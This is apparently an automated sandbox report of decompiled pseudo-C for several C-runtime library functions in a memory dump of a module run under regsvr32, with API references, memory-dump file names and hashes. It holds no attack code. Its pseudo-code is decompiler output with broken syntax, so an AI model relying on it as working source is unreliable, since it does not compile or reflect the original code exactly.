				_a8 = __rcx;
				r12d = r8d;
				_t123 = __rdx;
				if (__rdx == 0) goto 0x2b0668fe;
				 *__rdx = __rcx;
				if (__rcx != 0) goto 0x2b06691a;
				E00007FFD7FFD2B067698(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b066aa7;
				if (r8d == 0) goto 0x2b06692b;
				if (r8d - 2 < 0) goto 0x2b066903;
				if (r8d - 0x24 > 0) goto 0x2b066903;
				_t108 = __rcx + 2;
				_t4 = _t118 + 8; // 0x8
				r15d = _t4;
				goto 0x2b066941;
				_t62 =  *_t108 & 0x0000ffff;
				_t109 =  &(_t108[1]);
				if (E00007FFD7FFD2B07064C(_t62 & 0x0000ffff, r15d, __rcx) != 0) goto 0x2b06693a;
				if (_t62 != 0x2d) goto 0x2b06695b;
				goto 0x2b066961;
				if (_t62 != 0x2b) goto 0x2b066968;
				_t63 =  *_t109 & 0x0000ffff;
				_t110 =  &(_t109[1]);
				if (r12d != 0) goto 0x2b066998;
				if (E00007FFD7FFD2B0704B4( *_t109 & 0xffff) == 0) goto 0x2b066981;
				r12d = 0xa;
				goto 0x2b0669be;
				if ( *_t110 == 0x78) goto 0x2b066992;
				if ( *_t110 == 0x58) goto 0x2b066992;
				r12d = r15d;
				goto 0x2b0669be;
				r12d = 0x10;
				if (r12d != 0x10) goto 0x2b0669be;
				_t29 = E00007FFD7FFD2B0704B4(_t63 & 0x0000ffff);
				if (_t29 != 0) goto 0x2b0669be;
				if ( *_t110 == 0x78) goto 0x2b0669b6;
				if ( *_t110 != 0x58) goto 0x2b0669be;
				_t64 = _t110[1] & 0x0000ffff;
				_t30 = _t29 | 0xffffffff;
				r15d = _t30 / r12d;
				r14d = _t30 % r12d;
				if (E00007FFD7FFD2B0704B4(_t64 & 0x0000ffff) != 0xffffffff) goto 0x2b066a04;
				if (0x41 - _t64 > 0) goto 0x2b0669e9;
				if (_t64 - 0x5a <= 0) goto 0x2b0669f2;
				if (_t119 - 0x61 - 0x19 > 0) goto 0x2b066a20;
				if (_t119 - 0x61 - 0x19 > 0) goto 0x2b066a01;
				_t38 = (_t64 & 0x0000ffff) - 0x20 + 0xffffffc9;
				if (_t38 - r12d >= 0) goto 0x2b066a20;
				_t93 = 0 - r15d;
				if (_t93 < 0) goto 0x2b066a3a;
				if (_t93 != 0) goto 0x2b066a18;
				if (_t38 - r14d <= 0) goto 0x2b066a3a;
				if (_t123 != 0) goto 0x2b066a40;
				if ((bpl & 0x00000008) != 0) goto 0x2b066a49;
				_t113 =  !=  ? _a8 :  &(_t110[2]) - 2;
				goto 0x2b066a94;
				_t56 = 0 * r12d + _t38;
				goto 0x2b0669cc;
				if ((bpl & 0x00000004) != 0) goto 0x2b066a71;
				_t99 = bpl & 0x00000001;
				if (_t99 != 0) goto 0x2b066a94;
				if (_t99 == 0) goto 0x2b066a69;
				if (_t56 - 0x80000000 > 0) goto 0x2b066a71;
				if (((r9d | 0xe) & 0x00000002) != 0) goto 0x2b066a94;
				if (_t56 - 0x7fffffff <= 0) goto 0x2b066a94;
				E00007FFD7FFD2B067698(_t106);
				 *_t106 = 0x22;
				if ((bpl & 0x00000001) == 0) goto 0x2b066a87;
				goto 0x2b066a94;
				asm("sbb edi, edi");
				if (_t123 == 0) goto 0x2b066a9d;
				 *_t123 = ( !=  ? _a8 :  &(_t110[2]) - 2) + 2;
				if ((bpl & 0x00000002) == 0) goto 0x2b066aa5;
				return  ~( ~(_t56 | 0xffffffff) + 0x7fffffff);
			}

0x7ffd2b0668d4
0x7ffd2b0668d4
0x7ffd2b0668d9
0x7ffd2b0668f0
0x7ffd2b0668f3
0x7ffd2b0668f9
0x7ffd2b0668fb
0x7ffd2b066901
0x7ffd2b066903
0x7ffd2b066908
0x7ffd2b06690e
0x7ffd2b066915
0x7ffd2b06691d
0x7ffd2b066923
0x7ffd2b066929
0x7ffd2b066930
0x7ffd2b066934
0x7ffd2b066934
0x7ffd2b066938
0x7ffd2b06693a
0x7ffd2b06693d
0x7ffd2b06694e
0x7ffd2b066954
0x7ffd2b066959
0x7ffd2b06695f
0x7ffd2b066961
0x7ffd2b066964
0x7ffd2b06696b
0x7ffd2b066977
0x7ffd2b066979
0x7ffd2b06697f
0x7ffd2b066985
0x7ffd2b06698b
0x7ffd2b06698d
0x7ffd2b066990
0x7ffd2b066992
0x7ffd2b06699c
0x7ffd2b0669a1
0x7ffd2b0669a8
0x7ffd2b0669ae
0x7ffd2b0669b4
0x7ffd2b0669b6
0x7ffd2b0669c0
0x7ffd2b0669c6
0x7ffd2b0669c9
0x7ffd2b0669d7
0x7ffd2b0669e1
0x7ffd2b0669e7
0x7ffd2b0669f0
0x7ffd2b0669fc
0x7ffd2b066a01
0x7ffd2b066a07
0x7ffd2b066a0c
0x7ffd2b066a0f
0x7ffd2b066a11
0x7ffd2b066a16
0x7ffd2b066a1e
0x7ffd2b066a2d
0x7ffd2b066a32
0x7ffd2b066a38
0x7ffd2b066a3e
0x7ffd2b066a47
0x7ffd2b066a52
0x7ffd2b066a54
0x7ffd2b066a58
0x7ffd2b066a5f
0x7ffd2b066a67
0x7ffd2b066a6b
0x7ffd2b066a6f
0x7ffd2b066a71
0x7ffd2b066a76
0x7ffd2b066a80
0x7ffd2b066a85
0x7ffd2b066a8e
0x7ffd2b066a97
0x7ffd2b066a99
0x7ffd2b066aa1
0x7ffd2b066abb

APIs

_errno.LIBCMT ref: 00007FFD2B066903
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B06690E
iswctype.LIBCMT ref: 00007FFD2B066947
_errno.LIBCMT ref: 00007FFD2B066A71

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfoiswctype
String ID:
API String ID: 248606491-0
Opcode ID: abaaa9a80eb7cca7b31992979574e0795be7e9ce20ef753e96028a1c82d6f166
Instruction ID: 3f35e472abbcac87a7ea9f09af058cb10464aa28c996c879e05b6d6fcb8cebb2
Opcode Fuzzy Hash: abaaa9a80eb7cca7b31992979574e0795be7e9ce20ef753e96028a1c82d6f166
Instruction Fuzzy Hash: 5C51D762F0A1534CFB7617999E233FA21C9AF42754F158231DE59821E1EEFCB840B6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0728B4 Relevance: 6.2, APIs: 4, Instructions: 159
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 40%

			E00007FFD7FFD2B0728B4(void* __ecx, void* __eflags, long* __rax, long long __rbx, void* __rdx, long long __rsi, void* __rbp, intOrPtr _a8, long long _a16, long long _a24) {
				signed long long _v48;
				intOrPtr _v56;
				intOrPtr _t38;
				void* _t40;
				void* _t41;
				intOrPtr _t46;
				intOrPtr _t61;
				long* _t89;
				long long* _t95;
				long long _t96;
				intOrPtr _t101;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t108;
				long* _t110;
				signed long long _t116;
				long long* _t123;
				signed long long _t125;

				_t97 = __rbx;
				_t89 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t41 = __ecx;
				_a8 = 0;
				if (__eflags == 0) goto 0x2b0729a5;
				if (__eflags == 0) goto 0x2b072947;
				if (__eflags == 0) goto 0x2b072937;
				if (__eflags == 0) goto 0x2b072947;
				if (__eflags == 0) goto 0x2b072947;
				if (__eflags == 0) goto 0x2b072927;
				if (__eflags == 0) goto 0x2b072914;
				if (__eflags == 0) goto 0x2b072937;
				E00007FFD7FFD2B067698(__rax);
				 *((intOrPtr*)(__rax)) = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b072954;
				goto 0x2b0729b3;
				goto 0x2b0729b3;
				_t101 =  *0x2b0c9b28; // 0xa268000000026b91
				goto 0x2b0729b3;
				E00007FFD7FFD2B067ED8(__rax, __rbx, _t101, __rdx, __rsi, __rbp);
				_t110 = _t89;
				if (_t89 != 0) goto 0x2b07295c;
				goto 0x2b072ace;
				_t108 =  *((intOrPtr*)(_t89 + 0xa0));
				_t102 = _t108;
				_t116 =  *0x2b0833fc;
				if ( *((intOrPtr*)(_t102 + 4)) == _t41) goto 0x2b072985;
				_t103 = _t102 + 0x10;
				if (_t103 - (_t116 << 4) + _t108 < 0) goto 0x2b07296d;
				_t95 = (_t116 << 4) + _t108;
				if (_t103 - _t95 >= 0) goto 0x2b072999;
				if ( *((intOrPtr*)(_t103 + 4)) == _t41) goto 0x2b07299b;
				goto 0x2b0729c5;
				_a8 = 1;
				__imp__DecodePointer();
				_t123 = _t95;
				if (_t123 != 1) goto 0x2b0729d2;
				goto 0x2b072ace;
				if (_t123 != 0) goto 0x2b0729e1;
				E00007FFD7FFD2B0672AC(_t97, _t108, _t116);
				asm("int3");
				if (1 == 0) goto 0x2b0729ed;
				E00007FFD7FFD2B0696D8();
				if (_t41 == 8) goto 0x2b072a03;
				if (_t41 == 0xb) goto 0x2b072a03;
				if (_t41 == 4) goto 0x2b072a03;
				goto 0x2b072a2f;
				_t125 =  *(_t110 + 0xa8);
				_v48 = _t125;
				 *(_t110 + 0xa8) =  *(_t110 + 0xa8) & 0x00000000;
				if (_t41 != 8) goto 0x2b072a2f;
				r14d =  *((intOrPtr*)(_t110 + 0xb0));
				 *((intOrPtr*)(_t110 + 0xb0)) = 0x8c;
				goto 0x2b072a34;
				r14d = _a8;
				if (_t41 != 8) goto 0x2b072a72;
				_t46 =  *0x2b0833f0; // 0x3
				_t61 = _t46;
				_v56 = _t46;
				_t38 =  *0x2b0833f4; // 0x9
				if (_t61 - _t46 + _t38 >= 0) goto 0x2b072a7b;
				_t96 =  *((intOrPtr*)(_t110 + 0xa0));
				 *(_t96 + 8 + (_t61 + _t61) * 8) =  *(_t96 + 8 + (_t61 + _t61) * 8) & 0x00000000;
				_v56 = _t61 + 1;
				goto 0x2b072a45;
				E00007FFD7FFD2B067DD0();
				 *0x2b0c9b18 = _t96;
				if (1 == 0) goto 0x2b072a86;
				E00007FFD7FFD2B0695B8();
				if (_t41 != 8) goto 0x2b072a9c;
				 *_t123();
				goto 0x2b072aa1;
				_t40 =  *_t123();
				if (_t41 == 8) goto 0x2b072ab3;
				if (_t41 == 0xb) goto 0x2b072ab3;
				if (_t41 != 4) goto 0x2b0729cb;
				 *(_t110 + 0xa8) = _t125;
				if (_t41 != 8) goto 0x2b0729cb;
				 *((intOrPtr*)(_t110 + 0xb0)) = r14d;
				goto 0x2b0729cb;
				return _t40;
			}

0x7ffd2b0728b4
0x7ffd2b0728b4
0x7ffd2b0728b4
0x7ffd2b0728b9
0x7ffd2b0728cb
0x7ffd2b0728cf
0x7ffd2b0728da
0x7ffd2b0728e3
0x7ffd2b0728e8
0x7ffd2b0728ed
0x7ffd2b0728f2
0x7ffd2b0728f7
0x7ffd2b0728fc
0x7ffd2b072900
0x7ffd2b072902
0x7ffd2b072907
0x7ffd2b07290d
0x7ffd2b072912
0x7ffd2b072922
0x7ffd2b072935
0x7ffd2b07293e
0x7ffd2b072945
0x7ffd2b072947
0x7ffd2b07294c
0x7ffd2b072952
0x7ffd2b072957
0x7ffd2b07295c
0x7ffd2b072963
0x7ffd2b072966
0x7ffd2b072970
0x7ffd2b072972
0x7ffd2b072983
0x7ffd2b07298c
0x7ffd2b072992
0x7ffd2b072997
0x7ffd2b0729a3
0x7ffd2b0729b8
0x7ffd2b0729bc
0x7ffd2b0729c2
0x7ffd2b0729c9
0x7ffd2b0729cd
0x7ffd2b0729d5
0x7ffd2b0729db
0x7ffd2b0729e0
0x7ffd2b0729e3
0x7ffd2b0729e7
0x7ffd2b0729f0
0x7ffd2b0729f5
0x7ffd2b0729fa
0x7ffd2b072a01
0x7ffd2b072a03
0x7ffd2b072a0a
0x7ffd2b072a0f
0x7ffd2b072a1a
0x7ffd2b072a1c
0x7ffd2b072a23
0x7ffd2b072a2d
0x7ffd2b072a2f
0x7ffd2b072a37
0x7ffd2b072a39
0x7ffd2b072a3f
0x7ffd2b072a41
0x7ffd2b072a45
0x7ffd2b072a4f
0x7ffd2b072a57
0x7ffd2b072a5e
0x7ffd2b072a66
0x7ffd2b072a70
0x7ffd2b072a72
0x7ffd2b072a77
0x7ffd2b072a7d
0x7ffd2b072a81
0x7ffd2b072a8d
0x7ffd2b072a97
0x7ffd2b072a9a
0x7ffd2b072a9e
0x7ffd2b072aa3
0x7ffd2b072aa8
0x7ffd2b072aad
0x7ffd2b072ab3
0x7ffd2b072abc
0x7ffd2b072ac2
0x7ffd2b072ac9
0x7ffd2b072ae5

APIs

_errno.LIBCMT ref: 00007FFD2B072902
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07290D
DecodePointer.KERNEL32(?,?,?,?,?,00007FFD2B07842C,?,?,?,?,00007FFD2B07245E), ref: 00007FFD2B0729BC
_lock.LIBCMT ref: 00007FFD2B0729E7

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 27599310-0
Opcode ID: 8f6688346f2ec561f8f24f25de13fc98e5f900fe0abf6688ffd5af092e530c67
Instruction ID: c15ee0f49244c241b738970768ddd63be2336a637fda95700b4b4448eec61c84
Opcode Fuzzy Hash: 8f6688346f2ec561f8f24f25de13fc98e5f900fe0abf6688ffd5af092e530c67
Instruction Fuzzy Hash: 31518431F0E64696EA678B15AF61279A291FF8B740F184535D9CE026B4CFBCF841B290

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0740E4 Relevance: 6.1, APIs: 4, Instructions: 115
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD2B0740E4(void* __ecx, void* __eflags, long long __rbx, char* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr* __r9, void* _a8, void* _a16, void* _a24, void* _a32, char _a40, intOrPtr _a48) {
				char _v16;
				intOrPtr _v24;
				intOrPtr _v40;
				void* _t50;
				intOrPtr _t62;
				signed int _t63;
				void* _t67;
				void* _t69;
				intOrPtr* _t87;
				intOrPtr _t88;
				void* _t89;
				signed int _t90;
				intOrPtr* _t91;
				char* _t115;
				char* _t117;
				intOrPtr* _t125;
				intOrPtr* _t135;

				_t67 = __ecx;
				_t87 = _t125;
				 *((long long*)(_t87 + 8)) = __rbx;
				 *((long long*)(_t87 + 0x10)) = __rbp;
				 *((long long*)(_t87 + 0x18)) = __rsi;
				 *((long long*)(_t87 + 0x20)) = __rdi;
				_t135 = __r9;
				_t69 = r8d;
				E00007FFD7FFD2B066AE4(_t87, _t87 - 0x28, _a48);
				if (__rcx != 0) goto 0x2b07414b;
				E00007FFD7FFD2B067698(_t87);
				 *_t87 = __rcx + 0x16;
				E00007FFD7FFD2B069444();
				if (_v16 == dil) goto 0x2b074144;
				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
				goto 0x2b074262;
				if (__rdx != 0) goto 0x2b074174;
				E00007FFD7FFD2B067698(_t87);
				_t62 = __rdx + 0x16;
				 *_t87 = _t62;
				E00007FFD7FFD2B069444();
				if (_v16 == sil) goto 0x2b074144;
				_t88 = _v24;
				 *(_t88 + 0xc8) =  *(_t88 + 0xc8) & 0xfffffffd;
				goto 0x2b074144;
				if (_a40 == 0) goto 0x2b074195;
				if (_t62 != _t69) goto 0x2b074195;
				_t89 = _t88 + __rcx;
				 *((short*)(_t62 + _t89)) = 0x30;
				if ( *__r9 != 0x2d) goto 0x2b0741a2;
				 *__rcx = 0x2d;
				_t115 = __rcx + 1;
				_t79 =  *((intOrPtr*)(__r9 + 4));
				if ( *((intOrPtr*)(__r9 + 4)) > 0) goto 0x2b0741ca;
				E00007FFD7FFD2B0653B0(0 |  *__r9 == 0x0000002d, _t115);
				_t24 = _t89 + 1; // 0x1
				_t50 = E00007FFD7FFD2B064B80(_t67, _t79, _t115 + 1, _t115, _t24);
				 *_t115 = 0x30;
				goto 0x2b0741d2;
				_t90 =  *(_t135 + 4);
				_t117 = _t115 + 1 + _t90;
				if (_t69 <= 0) goto 0x2b07424d;
				_t121 = _t117 + 1;
				E00007FFD7FFD2B0653B0(_t50, _t117);
				_t27 = _t90 + 1; // 0x1
				E00007FFD7FFD2B064B80(_t67, _t69, _t117 + 1, _t117, _t27);
				_t91 =  *((intOrPtr*)(_v40 + 0x128));
				 *_t117 =  *((intOrPtr*)( *_t91));
				_t63 =  *(_t135 + 4);
				if (_t63 >= 0) goto 0x2b07424d;
				if (_a40 != 0) goto 0x2b07421f;
				_t66 =  >=  ?  ~_t63 : _t69;
				if (( >=  ?  ~_t63 : _t69) == 0) goto 0x2b07423d;
				E00007FFD7FFD2B0653B0( ~_t63, _t117 + 1);
				_t32 = _t91 + 1; // 0x1
				E00007FFD7FFD2B0656D0(E00007FFD7FFD2B064B80(_t67,  >=  ?  ~_t63 : _t69, ( >=  ?  ~_t63 : _t69) + _t121, _t121, _t32), _t67, 0x30, _t121, _t121, _t66);
				if (_v16 == 0) goto 0x2b074260;
				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
				return 0;
			}

0x7ffd2b0740e4
0x7ffd2b0740e4
0x7ffd2b0740e7
0x7ffd2b0740eb
0x7ffd2b0740ef
0x7ffd2b0740f3
0x7ffd2b074110
0x7ffd2b074115
0x7ffd2b074118
0x7ffd2b074120
0x7ffd2b074122
0x7ffd2b07412a
0x7ffd2b07412c
0x7ffd2b074136
0x7ffd2b07413d
0x7ffd2b074146
0x7ffd2b07414e
0x7ffd2b074150
0x7ffd2b074155
0x7ffd2b074158
0x7ffd2b07415a
0x7ffd2b074164
0x7ffd2b074166
0x7ffd2b07416b
0x7ffd2b074172
0x7ffd2b074179
0x7ffd2b07417d
0x7ffd2b07418c
0x7ffd2b07418f
0x7ffd2b07419a
0x7ffd2b07419c
0x7ffd2b07419f
0x7ffd2b0741a2
0x7ffd2b0741a8
0x7ffd2b0741ad
0x7ffd2b0741b9
0x7ffd2b0741bd
0x7ffd2b0741c2
0x7ffd2b0741c8
0x7ffd2b0741ca
0x7ffd2b0741cf
0x7ffd2b0741d4
0x7ffd2b0741d9
0x7ffd2b0741dd
0x7ffd2b0741e8
0x7ffd2b0741ec
0x7ffd2b0741f6
0x7ffd2b074202
0x7ffd2b074204
0x7ffd2b07420b
0x7ffd2b074214
0x7ffd2b07421c
0x7ffd2b074221
0x7ffd2b074226
0x7ffd2b074231
0x7ffd2b074248
0x7ffd2b074252
0x7ffd2b074259
0x7ffd2b07427c

APIs

Part of subcall function 00007FFD2B066AE4: _getptd.LIBCMT ref: 00007FFD2B066AF6

_errno.LIBCMT ref: 00007FFD2B074122
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07412C
_errno.LIBCMT ref: 00007FFD2B074150
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07415A

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd
String ID:
API String ID: 1297830140-0
Opcode ID: 935b354935433d327fe195aac0a6e1a519b339dfaf1ac7f6f11b535f2c6d5ff6
Instruction ID: 95d99b9bc4ee5de2bf9e1747f8b48d59f8a4ed762542a9b42e6df31e911894ec
Opcode Fuzzy Hash: 935b354935433d327fe195aac0a6e1a519b339dfaf1ac7f6f11b535f2c6d5ff6
Instruction Fuzzy Hash: E941F522B1A7818AE7529F14CAA527DB790FB56BD0F494131DB4D03BB2CFACE411E780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07EF84 Relevance: 6.1, APIs: 4, Instructions: 104
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00007FFD7FFD2B07EF84(void* __ecx, void* __eflags, long long __rcx, long long __rdx, void* __rbp, long long __r8, intOrPtr _a8, void* _a16, intOrPtr _a24, intOrPtr _a32) {
				long long _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* __rsi;
				void* _t62;
				signed long long _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				long long _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t96;
				long long _t108;
				long long _t112;
				void* _t118;
				signed long long _t120;
				long long _t125;

				_t115 = __r8;
				_t91 = __rcx;
				_t68 = __eflags;
				_t64 = __ecx;
				_t79 = _t112;
				 *((intOrPtr*)(_t79 + 0x20)) = r9d;
				 *((long long*)(_t79 + 0x18)) = __r8;
				 *((long long*)(_t79 + 0x10)) = __rdx;
				 *((long long*)(_t79 + 8)) = __rcx;
				r13d = r9d;
				_t108 = __r8;
				_t125 = __rcx;
				_t65 = E00007FFD7FFD2B07ECF8(__rcx, __rdx, __r8);
				E00007FFD7FFD2B07E4B4(_t79);
				_v64 = _t79;
				E00007FFD7FFD2B067F5C(__ecx, _t68, _t79, _t91, _t108, _t115);
				 *((intOrPtr*)(_t79 + 0x100)) =  *((intOrPtr*)(_t79 + 0x100)) + 1;
				if (_t65 == 0xffffffff) goto 0x2b07f0c4;
				if (_t65 - r13d <= 0) goto 0x2b07f0c4;
				if (_t65 - 0xffffffff <= 0) goto 0x2b07efea;
				if (_t65 -  *((intOrPtr*)(_t108 + 4)) < 0) goto 0x2b07efef;
				E00007FFD7FFD2B072484(_t79);
				_t120 = _t65;
				E00007FFD7FFD2B07E4B4(_t79);
				_t80 = _t79 + _t120 * 8;
				_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 8)) + _t80));
				_v72 = _t66;
				E00007FFD7FFD2B07E4B4(_t80);
				_t81 = _t80 + _t120 * 8;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t108 + 8)) + _t81 + 4)) == 0) goto 0x2b07f036;
				E00007FFD7FFD2B07E4B4(_t81);
				_t82 = _t81 + _t120 * 8;
				E00007FFD7FFD2B07E4B4(_t82);
				_t83 = _t82 +  *((intOrPtr*)( *((intOrPtr*)(_t108 + 8)) + _t82 + 4));
				goto 0x2b07f038;
				if (_t83 == 0) goto 0x2b07f09b;
				r9d = _t66;
				_t116 = _t108;
				E00007FFD7FFD2B07ED20(0, _t125, _t108);
				E00007FFD7FFD2B07E4B4(_t83);
				_t96 =  *((intOrPtr*)(_t108 + 8));
				_t84 = _t83 + _t120 * 8;
				_t75 =  *((intOrPtr*)(_t96 + _t84 + 4));
				if ( *((intOrPtr*)(_t96 + _t84 + 4)) == 0) goto 0x2b07f07e;
				E00007FFD7FFD2B07E4B4(_t84);
				_t85 = _t84 + _t120 * 8;
				E00007FFD7FFD2B07E4B4(_t85);
				_t86 = _t85 +  *((intOrPtr*)( *((intOrPtr*)(_t108 + 8)) + _t85 + 4));
				goto 0x2b07f080;
				r8d = 0x103;
				E00007FFD7FFD2B080860(_t86, _t125, _t118);
				_t99 = _v64;
				E00007FFD7FFD2B07E4E4(_t86, _v64);
				r13d = _a32;
				_t109 = _a24;
				_t67 = _v72;
				_v68 = _t67;
				goto 0x2b07efce;
				E00007FFD7FFD2B067F5C(_t64, _t75, _t86, _t99, _a24, _t116);
				if ( *((intOrPtr*)(_t86 + 0x100)) <= 0) goto 0x2b07f0dd;
				E00007FFD7FFD2B067F5C(_t64,  *((intOrPtr*)(_t86 + 0x100)), _t86, _t99, _a24, _t116);
				 *((intOrPtr*)(_t86 + 0x100)) =  *((intOrPtr*)(_t86 + 0x100)) - 1;
				if (_t67 == 0xffffffff) goto 0x2b07f0ec;
				if (_t67 - r13d <= 0) goto 0x2b07f0ec;
				_t62 = E00007FFD7FFD2B072484(_t86);
				r9d = _t67;
				return E00007FFD7FFD2B07ED20(_t62, _a8, _t109);
			}

0x7ffd2b07ef84
0x7ffd2b07ef84
0x7ffd2b07ef84
0x7ffd2b07ef84
0x7ffd2b07ef84
0x7ffd2b07ef87
0x7ffd2b07ef8b
0x7ffd2b07ef8f
0x7ffd2b07ef93
0x7ffd2b07efa6
0x7ffd2b07efa9
0x7ffd2b07efaf
0x7ffd2b07efb7
0x7ffd2b07efb9
0x7ffd2b07efbe
0x7ffd2b07efc3
0x7ffd2b07efc8
0x7ffd2b07efd1
0x7ffd2b07efda
0x7ffd2b07efe3
0x7ffd2b07efe8
0x7ffd2b07efea
0x7ffd2b07efef
0x7ffd2b07eff2
0x7ffd2b07effb
0x7ffd2b07efff
0x7ffd2b07f002
0x7ffd2b07f006
0x7ffd2b07f00f
0x7ffd2b07f018
0x7ffd2b07f01a
0x7ffd2b07f023
0x7ffd2b07f02c
0x7ffd2b07f031
0x7ffd2b07f034
0x7ffd2b07f03b
0x7ffd2b07f03d
0x7ffd2b07f040
0x7ffd2b07f049
0x7ffd2b07f04e
0x7ffd2b07f053
0x7ffd2b07f057
0x7ffd2b07f05b
0x7ffd2b07f060
0x7ffd2b07f062
0x7ffd2b07f06b
0x7ffd2b07f074
0x7ffd2b07f079
0x7ffd2b07f07c
0x7ffd2b07f080
0x7ffd2b07f08c
0x7ffd2b07f091
0x7ffd2b07f096
0x7ffd2b07f09d
0x7ffd2b07f0a5
0x7ffd2b07f0b7
0x7ffd2b07f0bb
0x7ffd2b07f0bf
0x7ffd2b07f0c4
0x7ffd2b07f0d0
0x7ffd2b07f0d2
0x7ffd2b07f0d7
0x7ffd2b07f0e0
0x7ffd2b07f0e5
0x7ffd2b07f0e7
0x7ffd2b07f0ec
0x7ffd2b07f10c

APIs

Part of subcall function 00007FFD2B07E4B4: _getptd.LIBCMT ref: 00007FFD2B07E4B8

_getptd.LIBCMT ref: 00007FFD2B07EFC3

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

_SetImageBase.LIBCMT ref: 00007FFD2B07F096
_getptd.LIBCMT ref: 00007FFD2B07F0C4
_getptd.LIBCMT ref: 00007FFD2B07F0D2

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$BaseImage_amsg_exit
String ID:
API String ID: 2306399499-0
